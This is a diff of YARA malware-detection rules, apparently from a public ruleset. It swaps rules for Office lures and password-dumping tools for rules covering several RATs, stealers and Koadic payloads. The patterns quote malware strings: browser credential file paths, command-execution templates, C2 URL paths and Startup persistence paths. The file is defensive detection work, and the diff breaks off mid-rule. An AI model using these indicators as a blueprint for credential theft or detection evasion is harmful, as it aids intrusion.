-		$s6 = "You are trying to view this document using Online Viewer" ascii nocase
-		$s7 = "This document was edited in a different version of" ascii nocase
-		$s8 = "document are locked and will not" ascii nocase
-		$s9 = "until the \"Enable\" button is pressed" ascii nocase
-		$s10 = "This document created in online version of Microsoft Office" ascii nocase
-		$s11 = "This document created in previous version of Microsoft Office" ascii nocase
-		$s12 = "This document protected by Microsoft Office" ascii nocase
-		$s13 = "This document encrypted by" ascii nocase
-		$s14 = "document created in earlier version of microsoft office" ascii nocase
+		$s1 = "AspireLogger -" wide
+		$s2 = "Application: @" wide
+		$s3 = "encryptedUsername" wide
+		$s4 = "encryptedPassword" wide
+		$s5 = "Fetch users fron logins" wide
+		$s6 = "URI=file:" wide
+		$s7 = "signons.sqlite" wide
+		$s8 = "logins.json" wide
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 or uint32( 0 ) == 0x74725c7b or uint32( 0 ) == 0x46445025 or uint32( 0 ) == 0x6d783f3c ) and 2 of them
+		( uint16( 0 ) == 0x5a4d and 6 of ( $s* ) ) or ( 7 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_OOXML_Excel4Macros_EXEC : FILE
+rule DITEKSHEN_MALWARE_Win_S05Kitty : FILE
 {
 	meta:
-		description = "Detects OOXML (decompressed) documents with Excel 4 Macros XLM macrosheet"
+		description = "Sector05 Kitty RAT payload"
 		author = "ditekSHen"
-		id = "674ef310-d3bc-5e15-862f-29aa111becb3"
+		id = "3261f6b6-21e7-5195-98db-9607ba530572"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L885-L898"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1024-L1045"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ab3994e4082390f65d030db0b898a20df1d7e4b0ca2fdedc7a9d0f1480fd0334"
+		logic_hash = "df2930694671c9ca16f2afeb799704647c9acf32be118706c342347ffe8ceb36"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "INDICATOR.OOXML.Excel4MacrosEXEC"
 
 	strings:
-		$ms = "<xm:macrosheet" ascii nocase
-		$s1 = ">FORMULA.FILL(" ascii nocase
-		$s2 = ">REGISTER(" ascii nocase
-		$s3 = ">EXEC(" ascii nocase
-		$s4 = ">RUN(" ascii nocase
+		$s1 = "Execute Comand" ascii
+		$s2 = "InjectExplorer" ascii
+		$s3 = "targetProcess = %s" fullword ascii
+		$s4 = "Process attach (%s)" fullword ascii
+		$s5 = "process name: %s" fullword ascii
+		$s6 = "cmd /c %s >%s" fullword ascii
+		$s7 = "CmdDown: %s, failed" fullword ascii
+		$s8 = "http://%s%s/%s" fullword ascii
+		$s9 = "tmp.LOG" fullword ascii
+		$x1 = "zerodll.dll" fullword ascii
+		$x2 = "OneDll.dll" fullword ascii
+		$x3 = "kkd.bat" fullword ascii
+		$x4 = "%s\\regsvr32.exe /s \"%s\"" fullword ascii
+		$x5 = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\fontchk.jse" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x6d783f3c and $ms and ( 2 of ( $s* ) or ( $s3 ) )
+		uint16( 0 ) == 0x5a4d and ( 8 of ( $s* ) or all of ( $x* ) )
 }
-rule DITEKSHEN_INDICATOR_OOXML_Excel4Macros_Autoopenhidden : FILE
+rule DITEKSHEN_MALWARE_Win_Fakewmi : FILE
 {
 	meta:
-		description = "Detects OOXML (decompressed) documents with Excel 4 Macros XLM macrosheet auto_open and state hidden"
+		description = "FakeWMI payload"
 		author = "ditekSHen"
-		id = "c5aab620-5254-5fc6-b236-4fe0f69cbd8e"
+		id = "689bc207-2bc6-50de-80d6-d1ba0a26b264"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L900-L910"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1047-L1064"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a93d8aa7ac025a0c2e8a9ac833f6d4c3cd3769ffca3f87455f43411d0021e828"
+		logic_hash = "627886cdd01f5f02e454ef284c77c87eb027ee33f6a51536758fb7f095271a40"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "INDICATOR.OOXML.Excel4MacrosEXEC"
+		clamav_sig = "MALWARE.Win.Trojan.Fakewmi"
 
 	strings:
-		$s1 = "state=\"veryhidden\"" ascii nocase
-		$s2 = "<definedName name=\"_xlnm.Auto_Open" ascii nocase
+		$s1 = "-BEGIN RSA PUBLIC KEY-" ascii
+		$s2 = ".exe|" ascii
+		$s3 = "cmd /c wmic " ascii
+		$s4 = "cmd /c sc " ascii
+		$s5 = "schtasks" ascii
+		$s6 = "taskkill" ascii
+		$s7 = "findstr" ascii
+		$s8 = "netsh interface" ascii
+		$s9 = "CreateService" ascii
 
 	condition:
-		uint32( 0 ) == 0x6d783f3c and all of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) and #s2 > 10 )
 }
-rule DITEKSHEN_INDICATOR_SUSPICOIUS_RTF_Encodedurl : FILE
+rule DITEKSHEN_MALWARE_Win_Baldr : FILE
 {
 	meta:
-		description = "Detects executables calling ClearMyTracksByProcess"
+		description = "Baldr payload"
 		author = "ditekSHen"
-		id = "6b3f0434-24b2-5ae8-a6fc-c0fdded4996f"
+		id = "cdc35a11-a97b-5e21-929e-01fed5172b55"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L930-L941"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1066-L1083"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cb791bb5e2af46ff9f1f07cef33bbd51edc44b2394d6f3eff31d39eaa5ff2a33"
+		logic_hash = "f8e97fd618209bc6ce609b60b1e1f1e359be7678474fad3b18a529487c64cd99"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.Baldr"
 
 	strings:
-		$s1 = "\\u-65431?\\u-65419?\\u-65419?\\u-65423?\\u-" ascii wide
-		$s2 = "\\u-65432?\\u-65420?\\u-65420?\\u-65424?\\u-" ascii wide
-		$s3 = "\\u-65433?\\u-65430?\\u-65427?\\u-65434?\\u-" ascii wide
-		$s4 = "\\u-65434?\\u-65431?\\u-65428?\\u-65435?\\u-" ascii wide
+		$x1 = "BALDR VERSION : {0}" fullword wide
+		$x2 = "Baldr" fullword ascii wide
+		$x3 = "{0}\\{1:n}.exe" fullword wide
+		$x4 = ".doc;.docx;.log;.txt;" fullword wide
+		$s1 = "<GetMAC>b__" ascii
+		$s2 = "<ExtractPrivateKey3>b__" ascii
+		$s3 = "UploadData" fullword ascii
+		$s6 = "get_NetworkInterfaceType" fullword ascii
+		$s5 = "get_Passwordcheck" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and any of them
+		( uint16( 0 ) == 0x5a4d and all of ( $x* ) ) or ( 2 of ( $x* ) and 4 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_RTF_Remotetemplate : CVE_2017_11882 FILE
+rule DITEKSHEN_MALWARE_Win_Megumin : FILE
 {
 	meta:
-		description = "Detects RTF documents potentially exploiting CVE-2017-11882"
+		description = "Megumin payload"
 		author = "ditekSHen"
-		id = "59b31243-a360-531f-99ea-32b54d19ab52"
+		id = "bb1743f7-0bd8-5c0a-ad78-c4747904204f"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L943-L953"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1085-L1108"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3a75072bc4d9c7dc53220afe359911c04cd3267c142058352de80ec430a53517"
-		score = 60
-		quality = 35
-		tags = "CVE-2017-11882, FILE"
+		logic_hash = "fb4934814c45d2465b6e1589c3b489116343ca0c17ebb916b5c9247fc676c74d"
+		score = 75
+		quality = 50
+		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.Megumin"
 
 	strings:
-		$s1 = "{\\*\\template http" ascii nocase
-		$s2 = "{\\*\\template file" ascii nocase
-		$s3 = "{\\*\\template \\u-" ascii nocase
+		$s1 = "loadpe|" fullword ascii
+		$s2 = "Megumin/2.0" fullword ascii
+		$s3 = "/c start /I \"\" \"" fullword ascii
+		$s4 = "jsbypass|" fullword ascii
+		$cnc1 = "Mozilla/5.0 (Windows NT 6.1) Megumin/2.0" fullword ascii
+		$cnc2 = "/cdn-cgi/l/chk_jschl?s=" fullword ascii
+		$cnc3 = "/newclip?hwid=" fullword ascii
+		$cnc4 = "/isClipper" fullword ascii
+		$cnc5 = "/task?hwid=" fullword ascii
+		$cnc6 = "/completed?hwid=" fullword ascii
+		$cnc7 = "/gate?hwid=" fullword ascii
+		$cnc8 = "/addbot?hwid=" fullword ascii
+		$pdb = "\\MeguminV2\\Release\\MeguminV2.pdb" ascii
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and 1 of them
+		( uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 5 of ( $cnc* ) or $pdb ) ) or 11 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Lazagne : FILE
+rule DITEKSHEN_MALWARE_Win_Rietspoof : FILE
 {
 	meta:
-		description = "Detects LaZagne post-exploitation password stealing tool. It is typically embedded with malware in the binary resources."
+		description = "Rietspoof payload"
 		author = "ditekSHen"
-		id = "68bc50b0-a64f-50b6-bfbf-a26a4d0970ef"
+		id = "b2d94705-ca59-56ae-8471-2c6895d355dc"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L3-L20"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1110-L1140"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "af4427174c1026204dc9c71878c5125efdf190328840b65fe4a69277a16fe7d2"
+		logic_hash = "d1d9baab83c904d1e8dcd7aeacdabfc79c1acee67006793c2240a42ebf9c62b2"
 		score = 75
-		quality = 50
+		quality = 73
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.Rietspoof"
 
 	strings:
-		$s1 = "blaZagne.exe.manifest" fullword ascii
-		$S2 = "opyi-windows-manifest-filename laZagne.exe.manifest" fullword ascii
-		$s3 = "lazagne.softwares.windows." ascii
-		$s4 = "lazagne.softwares.sysadmin." ascii
-		$s5 = "lazagne.softwares.php." ascii
-		$s6 = "lazagne.softwares.memory." ascii
-		$s7 = "lazagne.softwares.databases." ascii
-		$s8 = "lazagne.softwares.browsers." ascii
-		$s9 = "lazagne.config.write_output(" fullword ascii
-		$s10 = "lazagne.config." ascii
+		$c1 = "%s%s%s USER: user" fullword ascii
+		$c2 = "cmd /c %s" fullword ascii
+		$c3 = "CreateObject(\"Scripting.FileSystemObject\").DeleteFile(" ascii
+		$c4 = "WScript.Quit" fullword ascii
+		$c5 = "CPU: %s(%d)" fullword ascii
+		$c6 = "RAM: %lld Mb" fullword ascii
+		$c7 = "data.dat" fullword ascii
+		$c8 = "%s%s%s USER:" ascii
+		$v1_1 = ".vbs" ascii
+		$v1_2 = "HELLO" ascii
+		$v1_3 = "Wscript.Sleep" ascii
+		$v1_4 = "User-agent:Mozilla/5.0 (Windows; U;" ascii
+		$v2_1 = "Xjoepxt!" ascii
+		$v2_2 = "Content-MD5:%s" fullword ascii
+		$v2_3 = "M9h5an8f8zTjnyTwQVh6hYBdYsMqHiAz" fullword ascii
+		$v2_4 = "GET /%s?%s HTTP/1.1" fullword ascii
+		$v2_5 = "GET /?%s HTTP/1.1" fullword ascii
+		$pdb1 = "\\techloader\\loader\\loader.odb" ascii wide
+		$pdb2 = "\\loader\\Release\\loader_v1.0.pdb" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and any of them
+		uint16( 0 ) == 0x5a4d and ( 7 of ( $c* ) and ( 3 of ( $v* ) or 1 of ( $pdb* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Credstealer : FILE
+rule DITEKSHEN_MALWARE_Win_Modirat : FILE
 {
 	meta:
-		description = "Detects Python executable for stealing credentials including domain environments. Observed in MuddyWater."
+		description = "MoDiRAT payload"
 		author = "ditekSHen"
-		id = "ab587b12-f3e1-5f08-b27c-03ee9752e513"
+		id = "8b641c7a-5ebd-50e7-83cb-e408683c456b"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L22-L41"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1142-L1158"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e729c8b0b1db642acabbc4590833c05ce81447bb89e5f40aea5f0b8ebdee4438"
+		logic_hash = "d0760e9dab7e9c0affb2193ea249feea8bb58e519522ca2a562f015059ad5590"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "PYTHON27.DLL" fullword wide
-		$s2 = "C:\\Python27\\lib\\site-packages\\py2exe\\boot_common.pyR" fullword ascii
-		$s3 = "C:\\Python27\\lib\\site-packages\\py2exe\\boot_common.pyt" fullword ascii
-		$s4 = "subprocess.pyc" fullword ascii
-		$s5 = "MyGetProcAddress(%p, %p(%s)) -> %p" fullword ascii
-		$p1 = "Dump SAM hashes from target systemss" fullword ascii
-		$p2 = "Dump LSA secrets from target systemss" fullword ascii
-		$p3 = "Dump the NTDS.dit from target DCs using the specifed method" fullword ascii
-		$p4 = "Dump NTDS.dit password historys" fullword ascii
-		$p5 = "Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameterss" fullword ascii
-		$p6 = "Retrieve plaintext passwords and other information for accounts pushed through Group Policy Preferencess" fullword ascii
-		$p7 = "Combo file containing a list of domain\\username:password or username:password entriess" fullword ascii
+		$s1 = "add_Connected" fullword ascii
+		$s2 = "Statconnected" fullword ascii
+		$s3 = "StartConnect" fullword ascii
+		$s4 = "TelegramTitleDetect" fullword ascii
+		$s5 = "StartTitleTelegram" fullword ascii
+		$s6 = "Check_titles" fullword ascii
+		$s7 = "\\MoDi RAT V" ascii
+		$s8 = "IsBuzy" fullword ascii
+		$s9 = "Recording_Time" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) and 1 of ( $p* ) )
+		( uint16( 0 ) == 0x5a4d and 7 of them ) or all of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_CNC_Shootback : FILE
+rule DITEKSHEN_MALWARE_DOC_Koadicdoc : FILE
 {
 	meta:
-		description = "detects Python executable for CnC communication via reverse tunnels. Used by MuddyWater group."
+		description = "Koadic post-exploitation framework document payload"
 		author = "ditekSHen"
-		id = "fb608115-6d9f-5640-88be-674e53b07126"
+		id = "76d6c8df-4e42-5c0a-8344-f8848e7ac945"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L43-L62"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1160-L1174"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "996cabd4965164cb844cee1ab1e2894fc2b4fac14d4e660c456b494c5cbd0688"
+		logic_hash = "9f0538e1faee737a08d403a7f321ce45bdc70b390accfe378ba0d26292509fd7"
 		score = 75
 		quality = 50
 		tags = "FILE"
 
 	strings:
-		$s1 = "PYTHON27.DLL" fullword wide
-		$s2 = "C:\\Python27\\lib\\site-packages\\py2exe\\boot_common.pyR" fullword ascii
-		$s3 = "C:\\Python27\\lib\\site-packages\\py2exe\\boot_common.pyt" fullword ascii
-		$s4 = "subprocess.pyc" fullword ascii
-		$s5 = "MyGetProcAddress(%p, %p(%s)) -> %p" fullword ascii
-		$p1 = "Slaver(this pc):" ascii
-		$p2 = "Master(another public server):" ascii
-		$p3 = "Master(this pc):" ascii
-		$p4 = "running as slaver, master addr: {} target: {}R/" fullword ascii
-		$p5 = "Customer(this pc): " ascii
-		$p6 = "Customer(any internet user):" ascii
-		$p7 = "the actual traffic is:  customer <--> master(1.2.3.4) <--> slaver(this pc) <--> ssh(this pc)" fullword ascii
+		$s1 = "&@cls&@set" ascii
+		$s2 = /:~\d+,1%+/ ascii
+		$s3 = "Header Char" fullword wide
+		$s4 = "EMBED Package" ascii
+		$b1 = ".bat\"%" ascii
+		$b2 = ".bat');\\\"%" ascii
+		$b3 = ".bat',%" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) and 2 of ( $p* ) )
+		uint16( 0 ) == 0xcfd0 and all of ( $s* ) and 2 of ( $b* )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Fgdump : FILE
+rule DITEKSHEN_MALWARE_BAT_Koadicbat : FILE
 {
 	meta:
-		description = "detects all versions of the password dumping tool, fgdump. Observed to be used by DustSquad group."
+		description = "Koadic post-exploitation framework BAT payload"
 		author = "ditekSHen"
-		id = "2759fce2-db2a-5a48-bb37-931fd847a32d"
+		id = "dad7bb32-b1f1-5c6d-89b2-77cc49b5f020"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L64-L81"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1176-L1186"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fdccd91a84374f7c94843bd9c2191720959416acf2e33d7b28b42d63d7ea4ce3"
+		logic_hash = "1ee6c0189a5111c61af1dbe571524427bff95a7e3907f97ce51d272a8f701cf5"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 
 	strings:
-		$s1 = "dumping server %s" ascii
-		$s2 = "dump on server %s" ascii
-		$s3 = "dump passwords: %s" ascii
-		$s4 = "Dumping cache" nocase ascii
-		$s5 = "SECURITY\\Cache" ascii
-		$s6 = "LSASS.EXE process" ascii
-		$s7 = " AntiVirus " nocase ascii
-		$s8 = " IPC$ " ascii
-		$s9 = "Exec failed, GetLastError returned %d" fullword ascii
-		$10 = "writable connection to %s" ascii
+		$v1_1 = "&@cls&@set" ascii
+		$v2_1 = { 26 63 6c 73 0d 0a 40 25 }
+		$m1 = /:~\d+,1%+/ ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0xfeff and ( ( 1 of ( $v1* ) or 1 of ( $v2* ) ) and #m1 > 100 )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Sharpweb : FILE
+rule DITEKSHEN_MALWARE_JS_Koadicjs
 {
 	meta:
-		description = "detects all versions of the browser password dumping .NET tool, SharpWeb."
+		description = "Koadic post-exploitation framework JS payload"
 		author = "ditekSHen"
-		id = "f85dd689-c2a9-5cea-9c19-1e66ec942606"
+		id = "8598d5cb-0486-52b0-a686-6bd014f35c44"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L83-L110"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1188-L1208"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "036d576eb7acdededda7b31d3dda3a4928e01ff761bf45a1112da6bf7d4e2966"
+		logic_hash = "689116f74996fecf4c16c224e8cd842ad5b5e989de2dfdf0debeb9a26d8a12fa"
 		score = 75
-		quality = 40
-		tags = "FILE"
+		quality = 75
+		tags = ""
 
 	strings:
-		$param1 = "logins" nocase wide
-		$param2 = "cookies" nocase wide
-		$param3 = "edge" nocase wide
-		$param4 = "firefox" nocase wide
-		$param5 = "chrome" nocase wide
-		$path1 = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" wide
-		$path2 = "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" wide
-		$path3 = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" wide
-		$path4 = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks" wide
-		$sql1 = "UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;" nocase wide
-		$sql2 = "UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d" nocase wide
-		$sql3 = "SELECT action_url, username_value, password_value FROM logins" nocase wide
-		$func1 = "get_encryptedPassword" fullword ascii
-		$func2 = "<GetLogins>g__GetVaultElementValue0_0" fullword ascii
-		$func3 = "<encryptedPassword>k__BackingField" fullword ascii
-		$pdb = "\\SharpWeb\\obj\\Debug\\SharpWeb.pdb" fullword ascii
+		$s1 = "window.moveTo(-" ascii
+		$s2 = "window.onerror = function(sMsg, sUrl, sLine) { return false; }" fullword ascii
+		$s3 = "window.onfocus = function() { window.blur(); }" fullword ascii
+		$s4 = "window.resizeTo(" ascii
+		$s5 = "window.blur();" fullword ascii
+		$hf1 = "<hta:application caption=\"no\" windowState=\"minimize\" showInTaskBar=\"no\"" fullword ascii
+		$hf2 = "<hta:application caption=\"no\" showInTaskBar=\"no\" windowState=\"minimize\" navigable=\"no\" scroll=\"no\""
+		$ht1 = "<hta:application" ascii
+		$ht2 = "caption=\"no\"" ascii
+		$ht3 = "showInTaskBar=\"no\"" ascii
+		$ht4 = "windowState=\"minimize\"" ascii
+		$ht5 = "navigable=\"no\"" ascii
+		$ht6 = "scroll=\"no\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $func* ) and 3 of ( $param* ) and ( 1 of ( $path* ) or 1 of ( $sql* ) ) ) or $pdb )
+		all of ( $s* ) and ( 1 of ( $hf* ) or all of ( $ht* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Blackbone : FILE
+rule DITEKSHEN_MALWARE_Win_NETEAGLE : FILE
 {
 	meta:
-		description = "detects Blackbone password dumping tool on Windows 7-10 operating system."
+		description = "NETEAGLE backdoor payload"
 		author = "ditekSHen"
-		id = "a6d9f9d1-75fb-51af-87ad-80b4e135e759"
+		id = "89d1304a-63a0-50fc-855a-2e36cde1c5e7"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L112-L129"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1210-L1225"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e9dacd28accaef8a93ff8d3b5cf9437b3848791711a4a7118ab46d2bb6ca42d3"
+		logic_hash = "148de0ca332d3885d94eae8d15eb4aaa2bc4950c691c0e8817c816b7d4c55510"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 
 	strings:
-		$s1 = "BlackBone: %s: " ascii
-		$s2 = "\\BlackBoneDrv\\" ascii
-		$s3 = "\\DosDevices\\BlackBone" fullword wide
-		$s4 = "\\Temp\\BBImage.manifest" wide
-		$s5 = "\\Device\\BlackBone" fullword wide
-		$s6 = "BBExecuteInNewThread" fullword ascii
-		$s7 = "BBHideVAD" fullword ascii
-		$s8 = "BBInjectDll" fullword ascii
-		$s9 = "ntoskrnl.exe" fullword ascii
-		$s10 = "WDKTestCert Ton," ascii
+		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword ascii
+		$s2 = "System\\CurrentControlSet\\control\\ComputerName\\ComputerName" fullword ascii
+		$s3 = "Mozilla/4.0 (compatible; MSIE 5.0; Win32)" fullword ascii
+		$s4 = "/index.htm" fullword ascii
+		$s5 = "Help_ME" fullword ascii
+		$s6 = "GOTO ERROR" ascii
+		$s7 = "127.0.0.1" fullword ascii
+		$s8 = /pic\d\.bmp/ ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Mimikatz : FILE
+rule DITEKSHEN_MALWARE_WIN_BACKSPACE : FILE
 {
 	meta:
-		description = "Detects Mimikatz"
+		description = "BACKSPACE backdoor payload"
 		author = "ditekSHen"
-		id = "feb236c0-6e0d-5c2c-a050-cf1d000aaf38"
+		id = "ff9b1c2e-66a1-5e09-8bc2-a7543161e518"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L131-L164"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1227-L1247"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "42c9c78c88bb7c427d5f0bf1d3b0113205780142b499eb17858037ded0f2971e"
+		logic_hash = "3d366327c2272761349687b11e4d6baada5000936dc7f81665e0303f7d1e5121"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "mimilib.dll" ascii
-		$s2 = "mimidrv.sys" ascii
-		$s3 = "mimikatz.exe" ascii
-		$s4 = "\\mimidrv.pdb" ascii
-		$s5 = "mimikatz" ascii
-		$s6 = { 6d 00 69 00 6d 00 69 00 6b 00 61 00 74 00 7a }
-		$s7 = { 5c 00 6d 00 69 00 6d 00 69 00 64 00 72 00 76 }
-		$s8 = { 6d 00 69 00 6d 00 69 00 64 00 72 00 76 }
-		$s9 = "Lecture KIWI_MSV1_0_" ascii
-		$s10 = "Search for LSASS process" ascii
-		$f1 = "SspCredentialList" ascii
-		$f2 = "KerbGlobalLogonSessionTable" ascii
-		$f3 = "LiveGlobalLogonSessionList" ascii
-		$f4 = "TSGlobalCredTable" ascii
-		$f5 = "g_MasterKeyCacheList" ascii
-		$f6 = "l_LogSessList" ascii
-		$f7 = "lsasrv!" ascii
-		$f8 = "SekurLSA" ascii
-		$f9 = /Cached(Unlock|Interative|RemoteInteractive)/ ascii
-		$dll_1 = { c7 0? 00 00 01 00 [4-14] c7 0? 01 00 00 00 }
-		$dll_2 = { c7 0? 10 02 00 00 ?? 89 4? }
-		$sys_x86 = { a0 00 00 00 24 02 00 00 40 00 00 00 [0-4] b8 00 00 00 6c 02 00 00 40 00 00 00 }
-		$sys_x64 = { 88 01 00 00 3c 04 00 00 40 00 00 00 [0-4] e8 02 00 00 f8 02 00 00 40 00 00 00 }
+		$s1 = "Software\\Microsoft\\PnpSetup" ascii wide
+		$s2 = "Mutex_lnkword_little" ascii wide
+		$s3 = "(Prxy%c-%s:%u)" fullword ascii
+		$s4 = "(Prxy-No)" fullword ascii
+		$s5 = "/index.htm" fullword ascii
+		$s6 = "CONNECT %s:%d" ascii
+		$s7 = "\\$NtRecDoc$" fullword ascii
+		$s8 = "qazWSX123$%^" ascii
+		$s9 = "Software\\Microsoft\\Core" ascii wide
+		$s10 = "Mutex_lnkch" ascii wide
+		$s11 = "Event__lnkch__" ascii wide
+		$s12 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)" fullword ascii
